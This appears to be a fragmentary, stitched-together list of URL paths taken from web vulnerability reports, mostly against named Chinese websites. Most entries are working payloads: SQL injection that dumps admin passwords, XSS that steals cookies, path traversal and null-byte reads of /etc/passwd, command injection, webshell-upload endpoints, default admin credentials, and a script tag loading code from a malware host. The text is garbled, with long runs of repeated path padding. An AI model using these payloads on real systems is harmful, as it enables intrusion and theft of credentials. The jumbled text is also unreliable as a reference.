//api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23 / / /guise.txt / /english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ /statuses/destroy?keyfrom=main.body.button&1307444373294&cost=1244 /Zodiac/submit.php提交查询时,返回网站路径信息。 / /457563?url=http://www.qq.com /zdn_dy_detail.php?nid=3820%20and%201=2%20union%20select%20user(),database(),version() /redirect.php?tid=4301507&goto=lastpost#lastpost /appframe.php?adtag=applist_authspace&appid=14&width=1&frame=http://www.pkav.net /dict/history_txt.php?id=1227”可根据ID下载大量搜狗官方的明文词库。 /FCK/editor/filemanager/browser/default/connectors/test.html /news/news_list.php?key=%CA%D6%BB%FA%B2%E9%D1%AF'+and+1=2+union+select+1%2C2%2C3%2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2Cdatabase()%2C /j/remarks/new 4,'type':'S-x /widget/articles/50245/article/10011038/ /wow/zones.php?c=2 /show.php?picId=7356 /programs/view/ciLg9GRQycc/ /phpinfo.php /test.asp /zhuanti/zt/k2/message.php?id=279\ /bnf10000/view/download/down.jsp?path=/../../etc/&filename=passwd /DZ-xss-0day/%29 /wiki/map/index.php?title=adf';alert(1);a= /show.php?picId=7172 /p__z /xisigr/profile / /PxZHoxn?id= /mblog/publish.php?rnd= /attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd= / /message/addmsg.php?rnd= /images/t.js' /pub/topic" /xxx.js /service/carecenter/detail.asp?id=4723 /PxZHoxn?id= /mblog/publish.php?rnd= /attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd= / /message/addmsg.php?rnd= /images/t.js' /pub/topic" weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src=//www.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update /img/index/shell.php /robots.txt uc.myroman.com /action/index.php/show_one_info/id/349928 alert(1)// /js.js www.lashou.com登录后,cookie中保存了login_name2以及pwd2,相当危险)。 www.sdo.com,如果被用于钓鱼,成功率会很高 /search.php?key=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&SearchFromTop=1&catalog= /forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V /forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V /person/appjobs.php?id=48011 /v2.0/main/credit/portal_creditcard.shtml?url=http://www.pkav.net /movie/123456/comment_hot /lists / /search?q=a@&c=3 /system/2011/05/11/050936197.shtml /fangchan/index_all.php?table=109&n=75&width=125&height=160&s=5&widths=900 /tools/collegecost/collegecost.jsp?college_id=7966 /utsidakang/index.php?_c=utsidakang%27%3Cscript%3Ealert%28/x/%29%3C/script%3E&_a=upload&uid=9208 /resin-doc/features/migrate.xtp /Login?return_url=%22%3E%3Cscript%3Ealert%28/%C7%E7%CC%EC%D0%A1%D6%FD%20%C4%BEJJ/%29%3C/script%3E%3C /ajaxlogin.php?framelogin=1&callback=aleralertt /traf/ /products/670-686-690.html/x.asp http://adm.baidu.com/account/register.jsp?e=%D3%C3%BB%A7%C3%FB%B2%BB%BF%C9%D3%C3%3C/script%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E&userName=hexiaogen&mail=1269721185@qq.com /account/.register.jsp?e=%D3%C3%BB%A7%C3%FB%B2%BB%BF%C9%D3%C3%3C/script%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E&userName=hexiaogen&mail=1269721185@qq.com adm.baidu.com /account/.register.jsp?e=%D3%C3%BB%A7%C3%FB%B2%BB%BF%C9%D3%C3%3C/script%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E&userName=hexiaogen&mail=1269721185@qq.com /survey.php /k/%E6%9D%8E%E6%98%8C%E5%A5%8E%E5%88%A4%E6%AD%BB%E7%BC%93%E5%BC%95%E4%BA%89%E8%AE%AE /hack.txt /down.jsp?url=Templates/20110314.pptx /content_help.php?module=content_helpmessagelist&helpid=help/zh-CN/help_133.html /content_help.php?module=content_helpmessagelist&helpid=../../../../etc/passwd /web/transcode.jsp?pg=webz&url=www.568wyt.com /viewflash.htm?title=网站有漏洞&url=http://img1.126.net/channel1/rollGame0107.swf /search_1_0_0_%3Cscript%3Ealert%28%2F红颜知己%2F%29%3C%2Fscript%3E testor testor /reps/get_client_list存在注入 /info/xinwen/2011-07/48637.html/x.php /user/game_login.php?game_id=18&server_id=3%22%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E /wiki/MYML/invite/my:req-choice/login.html /R_Society/InteriroNewJob.aspx www.dzwww.com/rzboc1985/smilea/inc/UpFileFrame.asp /z/1111+and+1=2+union+select+1,2,user(),4,5/*/ /cms/motor/tagselect/tags/star_1269+and+1=2 /cms/motor/tagselect/tags/star_1269+and+1=1 /gujing/pkmore1.php?id=-401%20UnIOn%20sElEcT%201,2,uSeR(),4,5,daTAbAse(),GROUp_CoNcat(ColUMN_NaMe),VERsiON(),9,@@DatADIR,11,12,13,14,15,16%20from%20information_schema.COluMns%20whERe%20TABle_NAme=0x64765F61646D696E /fanta/ctl_award.php?action=index /gem/mu1.php /dologin.api /search/tag/?query=%3Cscript%3Ealert%28%2F%BA%EC%D1%D5%D6%AA%BC%BA%2F%29%3C%2Fscript%3E /search/tag/?url=http://www.baidu.com /contacts/?category=upload /news_nr.php?id=-1104 /c.php?t=blog&ts=bpost&k=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&stype=title /adminz/shouts.php?id=714&act=look /SinaEditor//Edit/editor/img.htm /class/smarty/internals/ /class/fck/editor/filemanager/connectors/php/upload.php /class/fck/editor/filemanager/connectors/php/connector.php /class/fck/editor/filemanager/connectors/php/config.php /news_nr.php?id=1000-1%2b1 /news_nr.php?id=1000 /s?bs=AAA&f=8&wd=BBB&inputT=862 /crossdomain.xml /gujing/more.php?%3E%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C%2Fscript%3E=123 /search.php?key=%3Cscript%3Ealert%28%22finger%22%29%3C%2Fscript%3E%3C%2Fspan%3E /skins/search.php?word=||| /gujing/pkmore1.php?id=401 /news/news_list.php?key=%CA%D6%BB%FA%B2%E9%D1%AF'+and+1=2+union+select+1%2C2%2C3%2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2Cdatabase()%2C /Flash/stat_hits.php?itemid=6463 /code.php?mod=list&itemid=&path=/test&file=../../config/config_ucenter.php /show_1_n.php?pid=1057 /support_1.php?cid=2%20and%201=2%20union%20select%201,2,username,4,pwd,6,7,8,9,10,11,12%20from%20fgt_admin /WAPUSER/900918.dos D27CDB6E-AE6D-11cf-96B8-444553540000 /789kk/8877.swf /789kk/8877.swf /),在搜索栏中输入“黑客帝国2”,点击搜索,应用程序出现异常,爆出网站绝对路径以及php路径 / /shopadmin/index.php?ctl=passport&act=login /shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../../&istheme=1 /shopadmin/index.php#ctl=system/template&act=editor&p[0]=../../&p[1]=index.php /software/download?soft=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.jpg /SysImages/File/sb.txt /cn/domain_info.txt /cn/domain_reason.txt /cn/error0.csv /cn/error1.csv /cn/error2.csv /extensions.php?E_name=jscms2&length=46&&num=6&order=postdate&pre=0&type=cid&id=12%27+and+1=1/* / /product.html /controls/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx /BankBJ/FundBase/fundgk.aspx?symbol=070008 /bccbpb/accountLogon.jsp?language=%22%3E%3Cscript%3Edocument.body.innerHTML%20=%20%27%20wooyun%CA%C7%B8%F6%BA%C3%B5%D8%B7%BD%20,%CE%D2%B5%C4%B4%ED.%27%3C/script%3E%22%3C /mail.asp /attachment.php?aid=660355%27 /resin-doc/viewfile/?file=index.jsp /tl/search.php?classStr=%bf%27&str=%3Cscript%3Ealert%28%2Fx%2F%29%3C%2Fscript%3E&imageField.x=0&imageField.y=0&a=1&a=2&a=3&a=4&a=5&a=6&a=7&a=8&a=9&a=10 /vcode/getvcode_js.php?callback=jsonpRes%22%3E%3Cscript%3Ealert%28/%C7%E7%CC%EC%D0%A1%D6%FD/%29%3C/script%3E /index.php?c=admin&a=ok /index.php?c=wish&a=.index&page=69 /index.php?c=uploadpic&a=uploadTS /index.php?c=winwin&a=index/../../admin/index.php%00& /goods.do?method=selPastGoods&conditionStr=%22%3E%3Cscript%3Ealert%28/%C7%E7%CC%EC%D0%A1%D6%FD/%29%3C/script%3E&pageNo=0&zoning=0%27 /zwds/csym_show.jsp?id=-359%20and%201=11%20union%20select%20user(),2,3,4,5,@@version,database(),8,conn,10,11,12,13,14,15,16,17,18 /merchant/mmodule/css/common/%22onmouseover=prompt%28/my_god_akast/%29%3E /index_detail.php?iid=9262%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C%22 /index.php /shopadmin/index.php?ctl=system/template&act=dlpkg&p[0]=../../ /index.php /shopadmin/index.php?ctl=system/template&act=dlpkg&p[0]=../../ /shopadmin/index.php#ctl=system/template&act=removePage&p[0]=此地方填要删除的目录 /login.php?goto_page= /test.js / /search.php?all_sun=all_sun&button=%e6%90%9c%e7%b4%a2%e7%bb%93%e6%9e%9c&end_price=&keywords=%27%22%28%29%26%251 / my5t3ry Set /user/reg/regajax.asp?action=getcityoption&province=%2527%2520%2575%256e%2569%256f%256e%2520%2553%2565%256c%2565%2563%2574%2520%2574%256f%2570%2520%2531%2530%2520%2541%2564%256d%2569%256e%2549%2544%252c%2555%2573%2565%2572%254e%2561%256d%2565%2526%2563%2568%2572%2528%2531%2532%2534%2529%2526%2550%2561%2573%2573%2557%256f%2572%2564%2520%2546%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 /user/reg/regajax.asp?action=getcityoption&province=%25i /wow/obj.php?id=-181557&z=3518 /celebrity/celebritytype.php?type=8 /vote/data/detail_vote/290b873e69f2ec33a1e0c9f2?alt=html&callback=window.alert%28document.cookie%29&t=1294931209000 /main.php?b=hi /show.php?id=152 /show.php?id=152 /bbs/index.html)--不停的搜索以下内容: / /_JSON_Page_User_Getgold.php?method=sendInvite¶meters=%5B%225447055%22%5D product.asp?Iheeoid= ASP/Default.html后台/SouthidcEditor/admin/login.asp默认帐号admin密码admin888拿webshell /experience/ /的方法取文件路径,最后执行,即可。 www.joomla.cn /gf/project/choice/ /licenses/gpl-2.0.html www.joomla.cn /gf/project/choice/ /administrator/language/zh-CN/xxxxxx.php /foo/?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23 / / /cgi-bin/qzshare/cgi_qzshare_urlcheck?url=http://wooyun.org /docs/en/template.resources.tpl#templates.from.string /docs/en/language.syntax.variables.tpl /match/api/share/id/630 /match/api/share/id/630%20and /织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root index.php?m=hotelinfo /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin /admin/frame.php /?mod=activity&act=activitydetail&activity_id=70 /hwmarket/security/login-user.do /dd /#app=key_ /dev_creg.php /dev_creg.php /tuan-3d0159719a408986 / /mobile/register.jsp?step=../../../../../../../../../../etc/passwd%00.png /sheyingdasai/iframe/upload.php?sid=26 /resource/index.php /json?action=SEND_NOTE_ACTION&sendMobile=159********%20&msg=Hi&familyID=361009&isReplay=1&playAction=1&createBy=admin //spdgzsy.php /2ji.php?page_style=%27%20onmouseover%3dprompt%28302667234%29%20bad%3d%27 /companyBranch.aspx?str=850存在SQL注射漏洞 /kuaidi.php?com=%7B0%7D&nu=%7B1%7D&key=%7B2%7D%20key=%3Ciframe%20src=http://www.ihbqc.com /bjgjj/17563805.nms?urlInfo=1,37068219770713841000,713713,GJJ006983794 /?random=0.9689430042142064&id=news_20110826000166 /share/parse?link=http://www.baidu.com/?a= /images/cnlogo.gif%00.php / / /showcase/context.vm?layout=../z.gif /images/mydisk_sample.jpg%00.php /images/default/logo.gif%00.php /editor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F /editor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/可上传shell文件,只做了简单的测试,没有成功。但不能保证可拦截所有形式的恶意文件上传。 /upload/duowan/20101205/x1.jsp /globalsearch/?mssearch=%22%3E%3Cscript%3Ealert%28%2Fxss-by-VIP%2F%29%3C%2Fscript%3E /ptinfo/safecenter/getpwd/ChgPwdStepOldPwd.aspx?showbindmobile=1 /mymanzuo/dealp?oid=7745182 /mymanzuo/dealp?oid=7745183 /mymanzuo/dealp?oid=7745184 /mymanzuo/dealp?oid=7745185 /mymanzuo/dealp?oid=xxxxxxx /mymanzuo/dealp?oid= /cgi-bin/xajh_xb?action=0&location_no=aaa&street_name=娱乐城 alert(document.cookie) /video.asp?uid=1519420908&gid=3174160&cid=286332744&videourl=xxx /bbs /aa.php /order_bill/print_bill/45388 /plus/search.php?keyword=xxxx&channeltype=-0&orderby=&kwtype=-1&pagesize=10&typeid=0&TotalResult=-336&PageNo=%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3EFuck%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C&plistgo=%C7%E7%CC%EC%D0%A1%D6%FD /144764511 /api.php?op=get_keywords&number=1&data=11 /api/get_keywords.php tool.phpcms.cn/api/get_keywords.php /air/?w=n&c=/../../../../../../../../../../../etc/passwd%00.html&a=dismiss&g= /air/?w=n&c=/../../../../../../../../../usr/local/nginx/conf/nginx.conf%00.html&a=dismiss&g /modify_all.php?action=change%22%3e%3cscript%3ealert /psu?/593272d7-8334-4f0f-81dd-5f1237b9b751/urMY8X.IlGSeaO9v97Hpv2QJmI6S3p9pjHR4RlIV41A!/b/YXpoWSpmbAAAYrXkVypebQAA /psu?/chouxiaozi/urMY8X.IlGSeaO9v97Hpv2QJmI6S3p9pjHR4RlIV41A!/b/YXpoWSpmbAAAYrXkVypebQAA /psu?/593272d7-8334-4f0f-81dd-5f1237b9b751/DUks9wEtblfotC4pB0VsEuvkDgsT5fq0hDNQ4HPv5eQ!/b/Yci5STa1GQAAYszNTDb8GQAA /psu?/chouxiaozi/这里加上你的数据 /psu?/chouxiaozi/DUks9wEtblfotC4pB0VsEuvkDgsT5fq0hDNQ4HPv5eQ!/b/Yci5STa1GQAAYszNTDb8GQAA /c?d=ifeng&i=z,0,0&u= /publicforum/articleslist/0/tianyaphoto.shtml /show_v3.html /api/desk/download.php?file=../../../../../../../etc/passwd /uitem/ucenter/a.html?callback=%2B%2Fv9+%2BADw-script%2BAD4-alert%28xss%29%2BADw-%2Fscript%2BAD4- /uitem/ucenter/a.html?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg- /csxs_gr.php?id=28 /images/qdpic_1.jpg/1.php /csxs_gr.php?id=28 /fjalsdiw /down.php?uri= /down.php?uri=http://www.xxx.com/exe.exe /down.php?uri=http://www.xxx.com/rar.rar /!service/share?image=1%22%20onerror=%22alert%281%29&href=&name= /mts?wd=%3Ciframe%2F**%2Fsrc%3D%22%2F%2Fwooyun.org%22%3E&box=1 /maineditor.do?good_id= /html/f.html这个URL /cgi-bin/php-cgi/html/svpnphp/ctrlmn/mnlist.php /dpool/bbs/viewthread.php?pm=edu--1343430&subid=0%3E%22%3E%3CScRiPt%3Ealert%28/1/%29%3C/ScRiPt%3E /msearch/webs/columbus/search?&qd=fs /myxw/news.jsP /readNews.jsP / /fenghuang/game/game_introduction_list.jsp?id=110220301000 /luxury/list.php?type=character&eid=A /tomos/ui/qnupload.jsp?id=dazqh /common/modules/mail/houseweek_more.php?id=-313+union /WebAccounts/getPwd.do?flag=3&password=123456&cust_no=xxxxx&user_name=xxxxx /?mo=site&fo=site_modify&siteid=4451 /?kw=%22%3E%3Cimg%20src%3D1%20onerror%3Dalert%28document.cookie%29%20width%3D0%20height%3D0%3E%3Cdiv /zx2/eqinfo.php?id=25294 /phpcms/index.php?m=content&c=push&a=init&module=&action=position_asdfsadf /product_info.php?id=33 /1.txt /index.php?pid=293 /expansion/fckeditor/editor/filemanager/connectors/test.html /expansion/fckeditor/editor/filemanager/connectors/uploadtest.html /list.php?fid=1 /mapp/admin/admin_dream.jsp?category_id=0 /iask/paper/paper.php?id=470&date=2011-05-21%3CScRiPt%3Ealert%28/cl.4m.bz/%29%3C%2fScRiPt%3E /admin/error/no_privilege.htm /party/party_oldinfo.php?pid=4139 /do/search.php?keyword=wooyun%22%27%3E%3Cscript%3Ealert%28/youstar/%29%3C/script%3E /chat_proxy.php?callback=%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ewooyun&id=3500001&_=1317569023359 /city_detail.php?id=96 /svc/pm/sms?uccpara=fx%3Dmob1649%60ver%3D7.8.0.87%60sn%3D1107-1034964554-ca8b8b78%60cver%3DNone%60width%3D240%60height%3D320%60ua%3DNOKIAN78%60ip%3D221.176.88.9%60nbr%3D%60fr%3Dsis%60ln%3Dzh_CN%60disp%3D%60feature_bit1%3D1144486655%60lang%3Dzh-cn%60pfid%3D28%60sms_no%3D%252B8613800898500%60ch%3Dadmin%40auto*%60mdn%3D%60prd%3DUCBrowser%60via%3DHTTP%2F1.1%2520HIHK-PS-WAP2-SV09-WAP3%2520(infoX-WISG%2C%2520Huawei%2520Technologies)%60innerip%3D221.176.88.9%60bid%3D800%60wi%3D%60li%3Dg9qKibW4p5yD14qJ*6sy4%2Fa04CxvqSR1dqA17u%2FrpHc0Ic%3D%60pver%3D3.1%60gi%3D%60btype%3DUM%60imei%3D354175026825200%60cp%3Disp%3A%25E7%25A7%25BB%25E5%258A%25A8%3Bprov%3A%25E6%25B5%25B7%25E5%258D%2597%3Bcity%3A%25E6%25B5%25B7%25E5%258F%25A3%3Bver%3A7.8.0.87%60bseq%3D11061716%60nt%3D0%60bmode%3DP3W%60imsi%3D460026089040783%60vcode%3D707d6399 /?"+XmlHttp.responsetext /ibm/console/secure/logon.do /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL project.youku.com/diy/upload.php /content/cache/user /content/cache/options /report/6kbbs-report.pdf /grid2008/detail.aspx?QueryID=3&CurRec=1 /signup/students.php?lang=zh-cn&entry=weiyonghu&url=http://weibo.com/dichan /signup/signup.php?lang=zh-cn /zhuyan/limeng5/weibo/taobao/weidishang/0929/9.html?cid=zRNmE63q&wbVersion=v3&wbuserid=2386024584%27%29%2Balert%28%22xss_by_bruce%22%29%2B%28%27 /redir.php?url=url.ifeng.com/Kdeh /gonggao.php?id=4 /gonggao.php?id=-4 /路径:C:\Inetpub\wwwroot /flash.php?fgid=21 /asp/76153.html[/url absolute 18px 40px hidden /handlers/LoginService.ashx?jsonp= alert(String.fromCharCode(88,83,83)) /web2.0 /web2.0/cfkjh.asp /web2.0/get.asp /web2.0/gift.asp /web2.0/index.asp /web2.0/intro.asp /web2.0/login.asp /web2.0/move.asp /web2.0/move1.asp /web2.0/move2.asp /web2.0/search.asp /web2.0/show.asp /web2.0/Validate.asp /.svn/entries /dianying/list.php?action=forumright zeracker/ /search/company/%22%3E%3Ciframe+onload%3Dalert%28document.domain%29%3E /search/school/%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /search/user/%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /search/tag/%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /search/venue/test%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /tag/%22%3E%3Ciframe%20onload%3Dalert%28document.domain%29%3E /home#search?q=fanfou'%3E%3Ciframe%20onload%3Dalert(%2FXSS%2F)%3E /boshi/home.php?action=forumright zerackernQQ:2036234 /boshi/test/home.php?action=forumright zerackernQQ:2036234 /admin1/login.php /test/phpinfo.php /static/getlist.php /static/getlistclass.php /index.php/youyan_content/getRepliesTogether/time /index.php/youyan?title=%E5%9B%BD%E5%86%852%E4%BA%BA%E5%88%9B%E4%B8%泄露了文件路径。 /manage/generally/login.php /moneditor/cs/game/gameResult.html?categoryId=&orderby=&ordertype=&categoryname= /admin/acu_test_5Itlt.asp /install/install.php /notice/upload_list.php?page='%3E%3Cscript%3Ealert()%3C/script%3E / /api/sina/login_api_sina.php / /search?hl=zh-CN&lr=&newwindow=1&safe=strict&biw=1365&bih=670&q=site%3Asina.com++index+of&oq=site%3Asina.com++index+of&aq=f&aqi=&aql=1&gs_sm=e&gs_upl=3886l6577l0l6816l11l8l0l0l0l0l658l658l5-1l1l0 /manager/html /manager/html /examples/jsp/dates/date.jsp /do/job.php?job=recommend&fid=101&id=8983 /script/redirect.php?class=china&action=http://www.baidu.com /就可以对应出新浪游戏的cgi地址。 /ecpclientdown/download.do?file=../../../../etc/hosts /js/pv.js /art/200812/101865_1.htm wap.ecplive.cn/ecpclientdown/download.do?file=../../../../../../../../../etc/passwd /search.php?query= /shequ/mu_center/muc_topicdetail.php?name=%22%3E%3Ciframe%20onload%3Dalert(document.domain)%3E /shequ/mu_center/muc_attention_list.php?key=%22%3E%3Ciframe+onload%3Dalert%28document.domain%29%3E&type=list&sinaid=2181491501&atten=0 sae.sina.com.cn/?m=coopmng&a=invite&app_id=wooyun&to_invite=someone@somedomain.com&role=other&priv[]=priv_deploy&inviteWords=hi,dude / insight /x.js /74cmsv3/templates/default/footer.php /2011/0819/bxn/post_vote.php?id=142 /news.php?id=31 /hxr-geren.php?pid=32 /api/icms.php?c=2 /fck/editor/filemanager/connectors/test.html /hodocs/admin/ /changyoutw/admin/爆绝对路径 /changyoutw/fck/ /home/ps/ps-req-fillform.htm /public/theme/search/?q=1234%27%2Balert%280%29%2B%27 /author/login /admin/login.jsp /2011/05/ldz0511/manage_imageabc/index.htm /xyqdata/admin_manage/login_1.php /admin_manage/login_1.php /admin_manage/index.php /v2/pages/admin/welcome.jsp /bk_manage/login.php?url=index.php /lol_skin/pts/admin/login_1.php?goto= /UID/status /hi%5Fheige/css/item/2792357ee092f60829388a60.css)中发现一处代码 expression /do/schools.php?f_id=8&a_id=2883 /do/schools.php?f_id=8&a_id=2883 /asngMu相信群里大部分的人都认识她。大家看看就好,切莫说出其名!”,利用短网址逃避腾讯恶意网站检测并伪装成QZONE空间诱骗用户输入QQ密码。 /ajax_request_friend.do?from=sg_guide_peopleumayknow_profile& /sobb/sobb-07.txt /.svn/entries /getpassword.asp /UserCenter/register.aspx /siteserver /server-info /server-status /v/b/63946504-2386024584.html /zh_about.asp?id=3 /images/logo.gif/1.php Insight-labs /match/api/share/?id=537 /subscribe.php /search_1_0_0_%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E /trust/index/detail/trustid/1/%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E /hercloset/358232/2154/1/0/0/%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E /cms/motor/artselect/keyword/%22%20onmouseover=alert%28123456%29%20bad=%22/t/1/page/1/timeera/0 /.htaccess /db.sql /manage/login.php /user/account/login /user/account/login Insight-labs /search.php?encode=YToyOntzOjg6ImtleXdvcmRzIjtzOjMxOiI%2bPHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4gIjtzOjE4OiJzZWFyY2hfZW5jb2RlX3RpbWUiO2k6MTMxOTgwNzk0Mzt9 /affiche.php?ad_id=34&uri=[URL /arrival/a.htm?to=[URL /arrival/a.htm?to=[URL /arrival/a.htm?to=[URL /messagewall/blessingsListAction.do?path=../ /photographs/show_page.php?id=420 /SysHome.do?origURL= /nantiankb/admin/article/article/DownloadTFile.do?file=vfltg3jxvkb2(1).html /card/viewCard.do?historyId=5129675&checksum=73e818cd75ddceffd4a400af7ad6178f /?c=spr_web_sina_zhengwen_ent_t001'%20aND%20'8'='8 /?c=spr_web_sina_zhengwen_ent_t001'%20aND%20'8'='3 /feedback/?product= http://emarketing.163.com/163today/163today_online.php /user/upload/img/show/%25u9EA6%25u901A5%252C%25u5B89%25u6208%252Cyayahi%252C7709599003.html?callback=%3Cscript%3Ealert%28/insight_labs/%29%3C/script%3E /detail/qimila/3741808 /浅谈绕过waf的数种方法.html /c:/windows/win.ini pma="http://www.phpmyadmin.net/some_doc_url/ structure_schemas database table table database structure_schemas www.51qljr.com www.51qljr.com /qly/clair_ls_txt.jsp?rid=54290 /qly/clair_ls_txt.jsp?rid=54290 http://forum.book.sina.com.cn/faq.php?action=search&searchsubmit=yes /ggxl/list.asp?news_id=329%20and%20%281%29=%281%29 /ggxl/list.asp?news_id=329%20%20or%201%20in%20%281,2,3,4,5,6%29 / /list.php?channel=&c=&year=INSIGHT000002%22%3E%27%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3C%27&dpc=1 ///phpinfo.php /eventdetail.php?eid=15201 /sinamall/manager/login.asp?redir=merchant%2Eadmin%2Easp&shortname=hsugn /auction/auction_detail.php?id=-2645+union+select+1,2,GROUP_CONCAT%28DISTINCT+COLUMN_NAME%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name=0x6175746F5F757365725F636F6D6D你懂的! /cooperate/itoolbar/tb_tg?callback= /news_show.asp?id=5 /stopright.asp?keyword=%27+and+1=2+union+select+1,user%28%29,3,4,5,6%23 /hd/bjsqx/config/chkMess.php?msid=要删除的ID&action=del /hd/bjsqx/config/chkMess.php /eventlist.php?status=1&etype=1&order= /payhistory/myaddress.aspx?addr_id=10000&cid=1&op=bindselected /cgi-bin/picDiy/upload.cgi?imgurl=;ls%20-la%20/ /admin/ /admin/ /admin/login.php?errmsg=%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3E /upload/admin/index.php?adminsid=802ad20c1483922311071eb0d92d52b5 /xx_gry.php?id=42099 /admin/index.php unknown-linux-gnu /admin/index.php /admin/index.php?page=1931%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E xxx4444xxx /search_ad.php?url=//wooyun.org /file/clowu7ct /page/article/search.asp?query=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&space=2&rn=20 /data/backupdata/dede_admin_0_74b930959d6ee431.txt /data/backupdata/dede_member_0_2b61cee8137bf896.txt /file/clowu7ct /cgi/mc?funcid=getusrnewmsgcnt&fid=1&addSubFdrs=1&language=0&style=0&template=newmsgres_setcookie.htm&callback= /cgi/mc?funcid=getusrnewmsgcnt&fid=1&addSubFdrs=1&language=0&style=0&template=newmsgres_setcookie.htm&callback= /cgi/mc?funcid=getusrnewmsgcnt&fid=1&addSubFdrs=1&language=0&style=0&template=newmsgres_setcookie.htm&callback= /cgi/mc 